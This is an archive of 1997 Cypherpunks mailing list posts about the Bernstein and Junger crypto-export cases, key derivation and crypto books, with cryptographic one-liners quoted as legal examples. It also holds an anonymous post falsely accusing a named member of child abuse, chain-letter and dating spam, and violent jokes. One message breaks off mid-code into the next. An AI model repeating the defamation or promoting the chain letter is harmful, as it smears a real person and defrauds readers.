Subject: FROM: Paul Bradley
Message-ID: <872942462.1313792.0@fownes.demon.co.uk>



Some of you may have noticed my absence from the list in the last few 
weeks, this is due to the box that runs fatmans loosing the magic 
smoke. I will be back on the list within the next few days. If anyone 
needs to contact me before then you can get me on +44 (0)1424 870921

Paul Bradley

Write soon

Gavin






From zdwn at zdwnhr.net  Sat Aug 30 21:05:14 1997
From: zdwn at zdwnhr.net (zdwn at zdwnhr.net)
Date: Sat, 30 Aug 1997 21:05:14 -0700 (PDT)
Subject: FREE SOFTWARE !!!
Message-ID: <13307005_65082580>



FREE Software Download!

Sell Internet Advertising With Your
Own Software, Instantly.

Best New Business Opportunity Of This Year.

Distribute software for new leading-edge
Internet Site. Personalized software is
provided to you- distribute the software 
and earn cash directly to you for supplying
unlock codes!

Be in business instantly and at very low
cost, in the hottest markets around-
	=>Internet Advertising
	=>Software Distribution

Be your own BOSS! No company, no hassle!
Clients send money directly to you for
your unlock codes for their software!

See all details at:
http://mlm1.com/admax/source/

(If the site is busy, keep trying!)






From goddesshera at juno.com  Sat Aug 30 06:06:19 1997
From: goddesshera at juno.com (Anonymous Remailer)
Date: Sat, 30 Aug 1997 21:06:19 +0800
Subject: Government Conspiracy
Message-ID: <19970830.065359.14119.9.goddesshera@juno.com>




Timmy C. Mayflower sexually molests little children, farm 
animals, and inanimate objects.

     < >            < >
      V    )_.._(    V Timmy C. Mayflower
      \\   <____>   //
        ~ <______> ~      >
        /~\______/~\     //
        /~\_____/~\     /_\
        /~\____/~\     /_\
         /~\___/\~\  _/_\/
            \___/\__/__\/
              \___/__\/

There's something wrong when I'm a felon under an increasing number of
laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms,
zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information
markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information
superhighway."


This message was automatically remailed. The sender is unknown, unlogged,
and nonreplyable. Send complaints and blocking requests to
.






From apb at iafrica.com  Sat Aug 30 06:47:57 1997
From: apb at iafrica.com (Alan Barrett)
Date: Sat, 30 Aug 1997 21:47:57 +0800
Subject: Want to help put Judge Patel's decision on the web?
In-Reply-To: <199708292351.QAA23568@toad.com>
Message-ID: 



Patel decision page 7 handled






From ant at notatla.demon.co.uk  Sat Aug 30 06:49:55 1997
From: ant at notatla.demon.co.uk (Antonomasia)
Date: Sat, 30 Aug 1997 21:49:55 +0800
Subject: Patel decision, page 21 handled
Message-ID: <199708301330.OAA01773@notatla.demon.co.uk>




--
##############################################################
# Antonomasia   ant at notatla.demon.co.uk                      #
# See http://www.notatla.demon.co.uk/                        #
#### !!! PGP 5.0 beta available now at ftp.replay.com !!! ####






From jya at pipeline.com  Sat Aug 30 07:05:57 1997
From: jya at pipeline.com (John Young)
Date: Sat, 30 Aug 1997 22:05:57 +0800
Subject: Stay Motion Handled 1-5
Message-ID: <1.5.4.32.19970830134610.00721300@pop.pipeline.com>



We're banging away on the 20 Stay Motion images, up to page 5
of the USA's Ex Parte, will continue, and send along the pack
when done. Not to head off anyone who wants to start at the back
and MITM.






From apb at iafrica.com  Sat Aug 30 07:14:09 1997
From: apb at iafrica.com (Alan Barrett)
Date: Sat, 30 Aug 1997 22:14:09 +0800
Subject: Want to help put Judge Patel's decision on the web?
In-Reply-To: <199708292351.QAA23568@toad.com>
Message-ID: 



Patel decision page 8 handled






From ericm at lne.com  Sat Aug 30 08:00:25 1997
From: ericm at lne.com (Eric Murray)
Date: Sat, 30 Aug 1997 23:00:25 +0800
Subject: Quote of the day (fwd)
In-Reply-To: 
Message-ID: <199708301453.HAA15920@slack.lne.com>



Tim May writes:
> 
> At 11:29 PM -0700 8/29/97, Bill Stewart wrote:
> >When is X-Day supposed to be?
> >
> >>----- Forwarded message from Quote of the day -----
> >>
> >>"I know the day it happens.  On August 29, 1997 it's going to feel
> >> pretty fucking real to you too.  Anybody not wearing two million sun
> >> block is going to have a real bad day.  Get it?"
> >>
> >> - Sarah Conner (played by Linda Hamilton), in Terminator 2: Judgement

[yea yea, we've all seen multiple copies of this]


> I don't know what you mean by "When is X-Day supposed to be?"

"X-day", in the credo of the Church of the Subgenuis, is
when the saved (people who have 'slack') are going to
be taken from the earth before it's destroyed, by 'pleasure saucers'
operated by Greys from Zeta Reticuli.  Or something like that.
Subgenius doctrine is hard to pin down since they're all
making it up as they go along.

X-day is supposed to be in 1998 some time, possibly April.

http://www.sunsite.unc.edu/subgenius/ has more info.

-- 
Eric Murray  Chief Security Scientist  N*Able Technologies  www.nabletech.com
(email:  ericm  at  lne.com   or   nabletech.com)          PGP keyid:E03F65E5






From MutualFunds at funds.com  Sat Aug 30 23:07:19 1997
From: MutualFunds at funds.com (MutualFunds at funds.com)
Date: Sat, 30 Aug 1997 23:07:19 -0700 (PDT)
Subject: Mutual Funds - The Real Deal
Message-ID: <0000000000.AAA000@funds.com>


Dear Friend:

NOW, AN EXCITING MLM OPPORTUNITY IS HERE...MUTUAL FUND$ & BABY
BOOMER$ - A PERFECT MLM MARRIAGE!!!

The bull market of the past 15 years is still roaring on with stocks
proving again why they are historically the premier investment choice of
savvy investors. Mutual Funds are the vehicles to invest in with
diversified investment risk for the underlying individual stocks which
have been on a steady climb upward since the early '80s. 

                                      FACTS ON MUTUAL FUNDS

- Mutual Funds manage about $2.8 Trillion

- 31% of U.S. households invest in Mutual Funds

- There are over 5,500 different Mutual Funds

                                     BENEFITS OF MUTUAL FUNDS

- LOWER INVESTOR RISK - due to diversification of portfolios by buying
many different securities.

- EASY ACCESS TO YOUR MONEY - Mutual Funds mean LIQUIDITY, i.e. you can
buy & sell your investment shares on any business day.

- PROFESSIONAL MANAGEMENT - skilled & experienced investment
professionals invest your money by tracking markets & trends to identify
opportunities. This allows investors to minimize their monitoring &
follow-up.

- NO LOAD/LOW LOAD FEE - Mutual Funds have either no broker's fees or
very low fees which are very attractive  especially with frequent
transactions.

- BEAUTY OF COMPOUNDING - e.g. a 15% return over 5 years then investors
get their principal investment back with the beauty of compounding on
reinvested dividends.

                            TARGET MARKET - BABY BOOMERS

The most powerful block of consumers are the baby boomers (those born 
between 1946-64 with current age range of 33-51). The
sheer power and financial clout of this group cannot be overstated!
Boomers are dictating changes in technology, consumer products, style
preferences, tastes, etc.  All across the spectrum in the U.S. Madison
Avenue has known this for years and has exploited it in exponential
fashion. Television advertisers and direct mail catalogue companies
recognize the power of this group. Ever notice how the models and actors
are starting to look a little older, a bit grayer? Ever notice how aging
rock and roll stars such as Mick Jagger, Rod Stewart, Neil Young, Tina
Turner, Bonnie Raitt, etc. are still wildly popular? Why? Because the
group that grew up with these stars has such huge clout in the
marketplace - The Baby Boomers!

Aging Boomers are the primary target for investments such as Mutual
Funds because they have the "need" for investments as they age and the
"discretionary income" to make these investments. The strong need for
Mutual Funds is driven by other factors as well: the sudden collective
realization by this voracious group of consumer products purchasers and
credit card users that there "are" financial limits (even for them) and
that now is the time to exercise financial prudence and discipline. With
the long-term viability of Social Security in doubt, retirement concerns
are starting to mount. This is especially acute with the continual
increases in life expectancy for both sexes. College education costs for
their kids are a big concern as well.

The vast majority of Boomers are computer owners and they are a
significant percentage of online subscribers. They have the need for
Mutual Fund investments, the discretionary income and now the newfound
desire to invest in their futures.

The TIMING COULDN'T BE BETTER FOR THIS MLM OPPORTUNITY!!!
Mutual Funds and Baby Boomers are now, and will continue to be, joined
at the hip right through the Millennium and beyond!

                                   HOW CAN YOU GET INVOLVED?

We will provide you with four (4) reports that will help the investor
get ready for his/her Mutual Funds investments by setting financial goals,
tips to help manage debt, analyze spending habits, patterns (1st Report).

The second Report will help explain Mutual Funds with emphasis on
professional management, portfolio diversification, etc.

The third Report will look at investment needs and goals and help lead
the investor to the proper investment choice at this stage of his/her
life.

Finally, the fourth Report will provide useful tips and information on
Asset Allocation and determining what mix of funds are best suited
for your financial needs and goals.

These Reports cost $5.00 each. Your total investment is $20.00 with a
vast market of baby boomers to target. This is a fresh program being
marketed on the Internet. It has vast potential because of the size of
the target group, the group's "deep pockets" plus the investment and
long-term security needs of the target group. Your marketing letter can
combine the advantages of Mutual Funds as an investment vehicle with the
benefits and needs of the target group. The four (4) Reports are
educational, informative and an excellent first step to a cohesive,
disciplined and systematic investment program.




                                               INSTRUCTIONS

STEP 1- ORDER all four REPORTS listed by Name and Number.  For each 
Report, send $5.00 CASH and a self-addressed stamped envelope to the 
person listed with the Report. You will need all 4 Reports because you
will be Reprinting and Reselling them.  International orders should be sent
with $6.00 CASH.  ($1.00 is for the extra postage).

STEP 2 - Replace the Name & Number under Report number 1 with yours, 
moving the one that was there down to Report # 2.  Name & Address for #2 
is moved to Report # 3 and name & address of #3 is moved to Report # 4. 
The # and address of #4 is then dropped from the list.

STEP 3 - Email a copy of the entire program to Anyone & Everyone.
You can get email addresses from companies on the Internet for 
very reasonable prices.


                                                     REPORTS  

*****ORDER EACH REPORT BY NUMBER AND NAME*****

ALWAYS SEND A SELF-ADDRESSED, STAMPED ENVELOPE AND
$5.00 CASH (INTERNATIONAL - $6.00 CASH)  FOR EACH ORDER
REQUESTING THE SPECIAL REPORT BY NAME AND NUMBER

REPORT # 1 - GETTING READY FOR INVESTING

1) Benzer Productions
    14341 Inglewood Ave., #183 
    Hawthorne, CA 90250

REPORT # 2 - MUTUAL FUNDS - WHAT & WHY

2) Signature
    369 Montezuma Ave., STE 351
    Santa Fe, NM 87501

REPORT # 3 - DETERMINING YOUR NEEDS & GOALS

3)  Benzer Productions
     14341 Inglewood Ave., #183
     Hawthorne, CA 90250

REPORT # 4 - ASSET ALLOCATION

4)  Signature
     369 Montezuma Ave., STE 351
     Santa Fe, NM 87501







                                                   CONCLUSION

This program is brand new. NOW is the time to get in on the ground floor
of an opportunity that will prove to be financially rewarding beyond
your dreams!!!  With MLM gaining more and more acceptance, this
program will have a long run because it makes sense and the product
(Mutual Funds) and the target group (Baby Boomers) are going to be
around a long, long time!!!

BEST WISHES WITH THE PROGRAM AND GOOD LUCK!










From jya at pipeline.com  Sat Aug 30 08:08:05 1997
From: jya at pipeline.com (John Young)
Date: Sat, 30 Aug 1997 23:08:05 +0800
Subject: Stay Motion Handled, All Pages
Message-ID: <1.5.4.32.19970830145247.0072e8f4@pop.pipeline.com>



We've completed keying in the 20 Stay Motion images, and
are formatting and proofreading. Will send along when ready.






From miner333 at dogbert.xroads.com  Sat Aug 30 09:34:33 1997
From: miner333 at dogbert.xroads.com (miner)
Date: Sun, 31 Aug 1997 00:34:33 +0800
Subject: patel pages 10,11,20,23 done
Message-ID: 








From jya at pipeline.com  Sat Aug 30 09:34:35 1997
From: jya at pipeline.com (John Young)
Date: Sun, 31 Aug 1997 00:34:35 +0800
Subject: Stay Pages Finished
Message-ID: <1.5.4.32.19970830161800.006c85ec@pop.pipeline.com>



The 20 images of the Stay have been digitized and formatted:

   http://jya.com/bernstein-stay.htm

Thanks again to Dan, the Bernstein primary team and EFF.








From dlv at bwalk.dm.com  Sat Aug 30 09:46:27 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 31 Aug 1997 00:46:27 +0800
Subject: Shrinks as Narcs for the State
In-Reply-To: 
Message-ID: 



Tim May  writes:

> I know a psychologist/therapist who is very worried about this issue, as
> are his associates. His records are no longer his, as he must inform the
> insurance agencies who are paying for his services what the diagnosis of a
> patient is.


Of course, the patient can choose to pay cash for the psychiatrist's
advice and not use the insurance.

...
> Further, those who visit doctors and shrinks are at risk for other reasons.
> The State has decreed that they "narc out" (inform on) their patients. Cf.
> Tarasoff, for example, which requires a mental health care professional,
> counselor, or doctor to inform the State if a client makes certain kinds of
> threats. This threat may cause the client to be locked up for observation.

I just happen to have been reading up on the Tarasoff case the other day,
so I'll clarify something.

A student at U.C.berkeley named Prosenjit Poddar became obsessed with his
fellow student Tatiana tarasoff, whom she met at a folk dance lessons
at the Internastional House. She kissed him at a new year's party, which
he interpreted as a proof that she wanted him. He secretly audiotaped their
conversations and spliced the tape so it sounded like she's saying she
loves him.

Poddar's been harrassing Tarassoff something awful and she was fully
aware that he's a dangerous nut. She took a vacation (supposedly to
get away from Poddar); soon after she returned, he killed her.

Before the murder, Poddar had gone to the campus psychologist and told him
about his obsession with Tarasoff. The psychologist, based on what the parient
said 1) tried but failed to have him involuntarily committed 2) notified
the campus police who detained and released Poddar, based on what the
the therapost said Poddar told him.

Tarasoff's parents sued the therapist, U.C.Berkeley, campus police (for
freeing Poddar), etc, for the wrongful death. The claim against the
therapist was that he should have notified Tarasoff that Poddar is
obsessed with her, in addition to calling the cops on his patient,
which he did. (Of course she already knew that all too well. If
she carried a gun and knew how to use it, she might still be alive.)

The California Supreme Court wrote in Tarasoff vs. Board of Regents (1976)
that "the protective privilege ends where public peril begins" and that
clinicians are obliged to use reasonable care to protect the potential
victim of a patient's violence, which may include warning the victim.

The duty of the clinician to notify the State if the patient says, e.g.,
that he intends to smoke pot, doesn't flow from the Tarasoff decision.

> (Many think this is as it should be. But why is this so? We don't require
> non-doctors and non-shrinks to report such threats. If Joe Cypherpunk tells
> me at a Cypherpunks meeting he thinks Janet Reno should be blown up on her
> September 7th visit to San Jose, I am under no obligation whatsoever to
> assist the police in verifying what his real intentions are, or of
> cooperating in any way. So why should a psychiatrist become a secret agent
> for the State? We live in a police state.)

A related question is, suppose a criminal happens to be religious and
confesses to a priest that he committed a crime (smoked pot, or whatever).
He is subsequently arrested and mentions to the cops that he confessed
to the priest. (Assume that the guy is an idiot, or else he wouldn't be
going to church in the first place :-)

Can the priest be prosecuted for not telling the cops about the confession?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From real at freenet.edmonton.ab.ca  Sat Aug 30 10:26:14 1997
From: real at freenet.edmonton.ab.ca (Graham-John Bullers)
Date: Sun, 31 Aug 1997 01:26:14 +0800
Subject: Government Conspiracy
In-Reply-To: <19970830.065359.14119.9.goddesshera@juno.com>
Message-ID: 



On Sat, 30 Aug 1997, Anonymous Remailer wrote:

I think Vulis needs each of us to send ten copies of this back to him.
> 
> Timmy C. Mayflower sexually molests little children, farm 
> animals, and inanimate objects.
> 
>      < >            < >
>       V    )_.._(    V Timmy C. Mayflower
>       \\   <____>   //
>         ~ <______> ~      >
>         /~\______/~\     //
>         /~\_____/~\     /_\
>         /~\____/~\     /_\
>          /~\___/\~\  _/_\/
>             \___/\__/__\/
>               \___/__\/
> 
> There's something wrong when I'm a felon under an increasing number of
> laws.
> Only one response to the key grabbers is warranted: "Death to Tyrants!"
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms,
> zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information
> markets,
> Higher Power: 2^1398269     | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information
> superhighway."
> 
> 
> This message was automatically remailed. The sender is unknown, unlogged,
> and nonreplyable. Send complaints and blocking requests to
> .
> 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Graham-John Bullers                      Moderator of alt.2600.moderated   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    email :  : 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         http://www.freenet.edmonton.ab.ca/~real/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From apb at iafrica.com  Sat Aug 30 10:28:46 1997
From: apb at iafrica.com (Alan Barrett)
Date: Sun, 31 Aug 1997 01:28:46 +0800
Subject: Want to help put Judge Patel's decision on the web?
In-Reply-To: <199708292351.QAA23568@toad.com>
Message-ID: 



Patel decision page 35 handled






From apb at iafrica.com  Sat Aug 30 10:50:20 1997
From: apb at iafrica.com (Alan Barrett)
Date: Sun, 31 Aug 1997 01:50:20 +0800
Subject: Want to help put Judge Patel's decision on the web?
In-Reply-To: <199708292351.QAA23568@toad.com>
Message-ID: 



Patel decision page 10 handled






From janke at unixg.ubc.ca  Sat Aug 30 10:59:16 1997
From: janke at unixg.ubc.ca (Leonard Janke)
Date: Sun, 31 Aug 1997 01:59:16 +0800
Subject: Top 10 Ways to Make a Grouchy Old CypherPunk Smile - #7
Message-ID: 




Top 10 Ways to Make a Grouchy Old CypherPunk Smile
--------------------------------------------------

#10) Find his shoes for him.
 
#9) Buy Kent Crispin a Dr. Kevorkian gift-certificate.

#8) Nuke Washington DC

#7) Send ten copies of this back to Vulis.

#6)

#5)

#4)

#3)

#2)
 
#1) [This space reserved for T.C. May]






From brianbr at together.net  Sat Aug 30 13:14:35 1997
From: brianbr at together.net (Brian B. Riley)
Date: Sun, 31 Aug 1997 04:14:35 +0800
Subject: Shrinks as Narcs for the State
Message-ID: <199708302005.QAA28553@mx02.together.net>



On 8/30/97 12:00 PM, Dr.Dimitri Vulis KOTM (dlv at bwalk.dm.com)  passed 
this wisdom:

>Can the priest be prosecuted for not telling the cops about the confession?

 Unless something has radically changed the sanctity of the Catholic 
confessional has never been breeched involuntarily ... i.e.,I do not 
believe that any court has ever successfully compelled a priest to 
divulge what he has heard in the confessional.

  Of course a problem lies in the construction of the question ... its 
easier to want to try to breech the confessional when you speak of a guy 
talking about killing a hundred people as opposed to a guy talking about 
stealing a candy bar. In various ethics discussions on this subject over 
the years it usually seems to comes down to the fact that morally the 
priest is bound to try to do something to stop the carnage without 
divulging what he was told.


Brian B. Riley --> http://www.macconnect.com/~brianbr
       For PGP Keys -  Send Email Subject "Get PGP Key"
  "When I die, please cast my ashes upon Bill Gates. For once, let him
    clean up after me! " -  Christian Worley







From junger at samsara.LAW.CWRU.Edu  Sat Aug 30 13:39:13 1997
From: junger at samsara.LAW.CWRU.Edu (Peter D. Junger)
Date: Sun, 31 Aug 1997 04:39:13 +0800
Subject: Developments in the _Junger_ suit
Message-ID: <199708302035.QAA15015@samsara.LAW.CWRU.Edu>




Now that Judge Patel has declared again in the _Bernstein_ case that
cryptographic software is entitled to the full protection of the First
Amendment, it is time for me to bring you up to date on some
developments on the Cleveland front.

To assist in the preparation of an amended complaint in my suit that,
like _Bernstein_, seeks to enjoin the enforcement of the export
regulations restricting publication of encryption software, my Legal
Attack Team on June 12 submitted several ``classification requests''
to the Department of Commerce in an effort to determine exactly what
is, and what is not, covered by the definition of encryption software 
set out in the Export Administration Regulations.

The Bureau of Export Aministration in the Department of Commerce
responded to these requests on or about July 4 and amplified their
response on or about August 7.  That response, though not generally
very helpful, did contain a number of surprises.  In particular, two
versions of a one-time pad encryption program using the XOR function
that I wrote in 8086 assembly language and machine code and a similar
OTP program written by Paul Leyland in one line of C, were classified
as EAR 99, which means that those programs are ``not subject to the
licensing restrictions for encryption software''.

No explanation was given as to why these programs implementing the one
unbreakable form of encryption are not classified as encryption
programs subject to ECCN 5D002.

More importantly, the classification requests included several pages
of HTML links to strong, unexportable encryption programs on several
FTP servers outside of the United States, but the Bureau of Export
Administration said that they were unable to classify that material,
and instead supplied us with an advisory opinion with respect to that
request saying:  ``Professor Junger's activity is not an export that
is subject to the Export Administration Regulations (EAR).''  The
Bureau subsequently amplified this response, saying:  ``While the use
of html links by a person might, in some applications, involve an
export . . . we reiterate that the activity described by your
submission is not an export activity that is subject to the EAR and
would also not constitute conduct prohibited by Section 744.9 of the
EAR.'' 

The Bureau did, however, classify several programs that we submitted,
including one written by me in C that implements several different
encryption algorithms and Adam Back's RSA program in three lines of
Perl (which is available at ), as being
encryption programs that are subject to the export restriction of the
EAR.

The most significant part of the Bureau's response, however, was their
professed inability to classify one way or the other all programs
implementing certain specified encryption algorithms such as, for
example, OTP programs that XOR the bytes comprising the message with
the bytes in a one-time pad.  The Bureau said as to this request:
``BXA cannot provide a single classification opinion for any
encryption product that `implemements' a certain algorithm''.

Due to the kindness of John Young, our requests for classification and
BXA's responses will be available shortly at .
The links to cryptographic programs on FTP sites outside the United
States are already available at 
.

Stay tuned for further announcements once this labor day weekend is
past.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
 EMAIL: junger at samsara.law.cwru.edu    URL:  http://samsara.law.cwru.edu   
     NOTE: junger at pdj2-ra.f-remote.cwru.edu no longer exists






From aba at dcs.ex.ac.uk  Sat Aug 30 14:58:23 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Sun, 31 Aug 1997 05:58:23 +0800
Subject: Developments in the _Junger_ suit
In-Reply-To: <199708302035.QAA15015@samsara.LAW.CWRU.Edu>
Message-ID: <199708302149.WAA08462@server.test.net>




Peter Junger  writes:
> [...]
> The Bureau did, however, classify several programs that we submitted,
> including one written by me in C that implements several different
> encryption algorithms and Adam Back's RSA program in three lines of
> Perl (which is available at ), as being
> encryption programs that are subject to the export restriction of the
> EAR.

Yay!  It's officially non-exportable.  It would be kind of fun to
observe a lawsuit built around someone in the US using this as a .sig:

: Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/
: 
: print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
: )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 BXA are quoted as writing:
> : While the use of html links by a person might, in some applications,
> : involve an export . . .

I must admit to being very curious as to how html links can be an
export.

Is this an export?

	RSA .sig

Is this?

	PGP 5.0i

(guessing URL).

This one might be fun also, but still I can't see that it's an export:

	

(it's an inline image of the RSA .sig).

> The most significant part of the Bureau's response, however, was their
> professed inability to classify one way or the other all programs
> implementing certain specified encryption algorithms such as, for
> example, OTP programs that XOR the bytes comprising the message with
> the bytes in a one-time pad.  

Weird so this is exportable (otp.c):

main(i,c)int*c;{for(c=fopen(c[1],"r");i=~getchar();putchar(getc(c)^~i));}

Here's a perl one too btw:

open P,shift;read(P,$p,length),print $_^$p while<>

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: <3.0.2.32.19970830141731.02fb96d4@popd.ix.netcom.com>



At 09:27 AM 8/29/97 -0400, Myron Lewis wrote:
>I know that the claims we make for the ASK ToolKit(TM) sound 
>a little too good to be true. 
...
>The ASK ToolKit does not do encryption.
>It only provides keys on demand for encryption. 

And his web page says
> you will be able to offer your customers the most secure applications
available.
>And they won't have to endure the pain of dealing with, 
>or spending the money for, key management systems.

The toolkit is fairly straightforward, if the descriptions are accurate.
Alice exchanges a secret with Bob somehow, and keeps track of 
which secret goes with which recipient, i.e. does the key management - 
either inside the toolkit, making the toolkit somewhat useful, 
or outside the toolkit, making the toolkit annoying to use.

At that point, Alice and Bob both have Secret(Alice,Bob),
and a counter N of the number of session keys they've generated.
When Alice wants to send Message to Bob, she uses the toolkit to calculate
	(SessionKey(N), Stuff2) = f(N, Secret(Alice,Bob),Alice,Bob,Stuff1)
and sends Bob (N,Stuff1,Stuff2,Alice,Bob) and E(Message,SessionKey(N)).

Having not licensed a copy of the toolkit, I don't know whether
Stuff1 and Stuff2 are transmitted, non-transmitted, or empty sets,
or whether the function f  maintains state other than N (if it does,
then Stuff1 and Stuff2 are the state variables, with Stuff1(N+1)==Stuff2(N).)

Some popular variants on this are
	f() = Hash(Secret,N)	
		(tends to leak)
	f() = Hash(N,Secret,N) or Hash(N,Hash(Secret,N)) or Hash(Secret,N,Secret)
	f() = Hash(SessionKey(N-1)) == Hash**N(Secret)	     
		(terrible - leaks badly.)
	f() = (Hash2(salt,Hash**N(Secret)), salt)    
		(much stronger if Hash2 is good.)

Then there's S/Key: f() = Hash**(M-N)(Secret) where M is a big number,
typically 100.
This works well for passwords, since you can easily verify that
Hash**N(f()) = Secret,
though it's dangerous for encryption passwords, since cracking one message
key cracks
all the previous messages. 

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From dave at bureau42.ml.org  Sat Aug 30 16:24:37 1997
From: dave at bureau42.ml.org (David E. Smith)
Date: Sun, 31 Aug 1997 07:24:37 +0800
Subject: Crypto best book
In-Reply-To: 
Message-ID: 



> > >           What is the best book about cryptography ?
> >
> > Although "best" is certainly subjective, Nine out of Ten Cypherpunks (TM)
> > recommend Bruce Schneier's "Applied Cryptography."
> >
> > http://www.counterpane.com/applied.html
> 
> Bruce did a lousy job on this book.
> 
> If his is the first or the only book you read on the subject of
> cryptography, your knowledge base will be seriously deficient.

(shrug)

I'm certainly no crypto expert, what with Bruce's book being among the very
few texts I've read (that and a couple of grad-level crypto textbooks that
ended up in the University library because we don't have a grad program in
the computer science department).

Recommendations, then?

dave






From darlene at uunet.net  Sun Aug 31 07:33:51 1997
From: darlene at uunet.net (darlene at uunet.net)
Date: Sun, 31 Aug 1997 07:33:51 -0700 (PDT)
Subject: What's up?
Message-ID: <472649088220Unn93756@uunet.com>


Ladies & Gents.

Have you found the right on-line relationship yet?

We have assisted literally thousands of people like yourself find that special on-line relationship of their circuit dreams.

Our program is very unique.  You tell us what your interests are, and the type of person that you want to meet.  From this we can match you with people of the same interests and hobbies.  Our database lists thousands of members, which we can match you with.

This is a lifetime membership.  You can start and stop as often as you like.  Some want several relationships.  Others want just one real serious relationship.  It is all up to you.  A lot of these relationships have gone way past the keyboard.

Everything is completely confidential.  We let you and the other party know that we have matched you and your interests.  If both agree then we exchange Screen names or E-mail address for you.

Our lifetime membership is usually $69.95.
Because of the overwhelming response we are glad to offer you for one week only a lifetime membership for only $29.95. 

Once we receive your application, Our staff will get to work on it right away.  You can be in a new relationship in as little as one week.

Your happiness is our first priority.  We want you to tell your friends.

All you need to do to get started is to fill out the application at the bottom of the screen and mail it in with a check or money order to the address below.  Remember to let us know when you want us to stop sending you information on other members.


Thanks ahead for your order.


Screen name: or E-mail address:  ___________________________

City or Area you are from: _________________________________

Hobbies:   ______________________________________________

Interests: ________________________________________________

Sex MorF: ______________  Age : _____________


In your own words tell us the type of person that you would be interested in.  List things such as sex, age, interests, and hobbies.

The more information that you give us, the easier it will be to find a match.  Remember we have thousands of members all over the world.  You will need to let us know if you would care for a long distance relationship.

Note:  We will handle correspondence with you by E-mail, unless you say otherwise.


What type of person interests you?


_______________________________________________________
_______________________________________________________
_______________________________________________________
_______________________________________________________
_______________________________________________________
_______________________________________________________
_______________________________________________________
_______________________________________________________

If we have any questions about your application, our staff may e-mail you with a question
If you are not completely happy with-in 30 days we will refund 100% of your money!


Mail information above and check or money order for $29.95 to:

Delcom
C/O Cyber Connections
P.O. Box 916
Walnut Cove, NC.  27052


Thanks again!






----------------------- Headers --------------------------------
Received: from  mrin39.mail.aol.com (mrin39.mail.aol.com [152.163.116.77]) by mrin37.mx.aol.com with SMTP; Fri, 15 Aug 1997 18:20:03 -0400
Received: from ha1.aol.net (ha1.aol.net [217.172.0.60])
	  by mrin39.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with ESMTP id SAA116545;
	  Fri, 15 Aug 1997 18:19:56 -0400 (EDT)
Received: from mail.aol.net (s5.aol.com [217.182.57.5]) by ha1.aol.net (aol*NET 2.1.0) with SMTP id SAA11112; Fri, 15 Aug 1997 18:19:50 -0400 (EDT)
From: Delcon at Aol.com
Received: from Mailhost.AOL.COM by Danny365 at Aol.com (8.8.5/8.6.5) with SMTP id QGT64522 for ; Fri, 15 Aug 1997 18:19:50 -0600 (EST)
Date: Fri, 15 Aug 97 18:19:50 EST
To: Tdave at juno.com
Subject: Members at aol.com
Message-ID: <187548889994 Hrr64973 at AOL.com>
Reply-To: Mailhost.Member at Aol.com
X-UIDL: 58585858585858585858585858585845
Comments: Authenticated sender is 













































































































From tcmay at got.net  Sat Aug 30 16:56:18 1997
From: tcmay at got.net (Tim May)
Date: Sun, 31 Aug 1997 07:56:18 +0800
Subject: Crypto best book
In-Reply-To: 
Message-ID: 



At 10:54 AM -0700 8/30/97, David E. Smith wrote:
>> > >           What is the best book about cryptography ?
>> >
>> > Although "best" is certainly subjective, Nine out of Ten Cypherpunks (TM)
>> > recommend Bruce Schneier's "Applied Cryptography."
>> >
>> > http://www.counterpane.com/applied.html
>>
>> Bruce did a lousy job on this book.
>>
>> If his is the first or the only book you read on the subject of
>> cryptography, your knowledge base will be seriously deficient.
>
>(shrug)
>
>I'm certainly no crypto expert, what with Bruce's book being among the very
>few texts I've read (that and a couple of grad-level crypto textbooks that
>ended up in the University library because we don't have a grad program in
>the computer science department).
>
>Recommendations, then?

You were given recommendations for Schneier's book. If you discount those
recommendations because of the opinion of one disgruntled reader, this is
your problem.

Schneier is a reasonable overview, with more of an emphasis on currently
coded algorithms than some of the more academic treatments have.  The
academic treatments are widely available, too, from amazon.com and other
bookstores.  They tend to be a decade or more old, and obviously lack
discussion of recent stuff. Denning, Meyer and Matyas, Brassard, etc. The
compendium of crypto articles edited by Gus Simmons is also pretty good.

It depends on one's interest. There are specialized number theory books,
manuals on how to use PGP (worthless, in my view, for various reasons), and
even books on digital cash.

But listen to what several people said about Schneier. Even if Vulis
dislikes it, it's still almost an "essential" book. And anyone at all
interested in crypto will likely end up with a bunch of books.

--Tim May

